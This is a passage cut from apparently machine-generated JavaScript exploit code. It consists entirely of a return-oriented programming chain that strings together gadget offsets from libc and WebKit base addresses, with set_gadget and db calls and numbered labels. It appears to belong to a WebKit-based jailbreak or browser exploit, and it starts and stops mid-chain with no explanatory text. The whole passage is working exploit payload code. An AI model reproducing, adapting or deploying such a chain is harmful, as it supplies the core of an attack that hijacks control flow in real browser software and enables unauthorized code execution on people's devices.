//pop rsi ropchain+219384, //L3814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3813: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3815: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+219480, //L3816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3816: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3818: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+219600, //L3821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219584, //L3819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3821: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+219776, //L3824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+219792, //L3825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219744, //L3822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219760, //L3823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3822: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3823: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3824: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3825: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+219952, //L3829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219920, //L3827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+219936, //L3828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3826: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3829: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+220040, //L3830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220056, //L3831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3830: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3831: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+220232, //L3833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220248, //L3834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220216, //L3832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3832: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3833: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3834: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+220408, //L3839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220424, //L3840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+220360, //L3836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3836: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3837: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3838: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3839: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3840: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+220536, //L3841+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+220528, //L3841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3841: db([0, 0]); // 0x0 set_gadgets([ ropchain+220552, //L3841+24 ropchain+221504, //L3835 libc_base+764760, //pop rsi ropchain+220592, //L3842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3842: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3844: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+220712, //L3847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220696, //L3845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3845: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3847: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+220856, //L3850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220824, //L3848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+220840, //L3849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3848: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3849: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3850: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+220952, //L3852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3851: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3852: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3853: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+221056, //L3854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221072, //L3855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3854: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3855: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+221248, //L3857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221264, //L3858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221232, //L3856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3856: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3857: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3858: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+221408, //L3861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221424, //L3862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+221376, //L3859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3859: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3860: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3861: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3862: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+221496, //L3863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3863: db([0, 0]); // 0x0 //L3835: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+221624, //L3866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221640, //L3867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221608, //L3865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3865: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3867: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+221752, //L3869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221800, //L3872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+221768, //L3870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3869: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3870: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3871: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3872: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+221912, //L3873+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+221904, //L3873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3873: db([0, 0]); // 0x0 set_gadgets([ ropchain+221928, //L3873+24 ropchain+223952, //L3868 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221968, //L3874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3874: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3875: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L3876: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+222160, //L3880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+222128, //L3878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222144, //L3879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3877: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3879: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3880: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+222216, //L3882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3882: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+222344, //L3884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+222360, //L3885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222328, //L3883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3883: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3884: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3885: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+222456, //L3887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222440, //L3886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3886: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3887: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+222536, //L3888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3888: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3890: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+222656, //L3893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+222640, //L3891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3893: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+222800, //L3896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+222768, //L3894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+222784, //L3895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3894: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3895: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3896: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+222872, //L3898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3898: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+222928, //L3899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3899: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+223008, //L3901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3901: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3903: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+223128, //L3906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+223112, //L3904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3904: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3906: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223272, //L3909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+223240, //L3907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+223256, //L3908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3907: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3908: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3909: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+223360, //L3911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3910: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3911: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+223416, //L3912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3912: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3914: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+223496, //L3916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3916: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+223600, //L3917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+223616, //L3918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3917: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3918: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+223704, //L3920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3920: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223760, //L3921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3921: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+223832, //L3924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3924: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223888, //L3925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3925: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+223968, //L3927 //L3868: libc_base+782311, //pop rsp ropchain+223984, //L3928 //L3927: libc_base+782311, //pop rsp ropchain+219096, //L3806 //L3928: //L3929: libc_base+764760, //pop rsi ropchain+224024, //L3930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3930: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3932: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+224144, //L3935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+224128, //L3933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3933: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3935: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+224320, //L3938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+224336, //L3939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+224288, //L3936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+224304, //L3937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3936: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3937: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3938: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3939: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+224432, //L3941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+224416, //L3940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3940: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3941: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3942: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3943: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3944: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+224632, //L3946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+224688, //L3947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3947: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+224824, //L3951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+224808, //L3950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3949: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3950: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3951: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+224928, //L3954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+224960, //L3956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3953: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3954: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+225072, //L3957+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+225064, //L3957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3957: db([0, 0]); // 0x0 set_gadgets([ ropchain+225088, //L3957+24 ropchain+226480, //L3952 libc_base+764760, //pop rsi ropchain+225128, //L3958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3958: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3960: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+225248, //L3963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225232, //L3961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3961: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3963: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+225392, //L3966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225360, //L3964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225376, //L3965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3964: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3965: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3966: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+225472, //L3967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3967: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3969: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+225592, //L3972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225576, //L3970 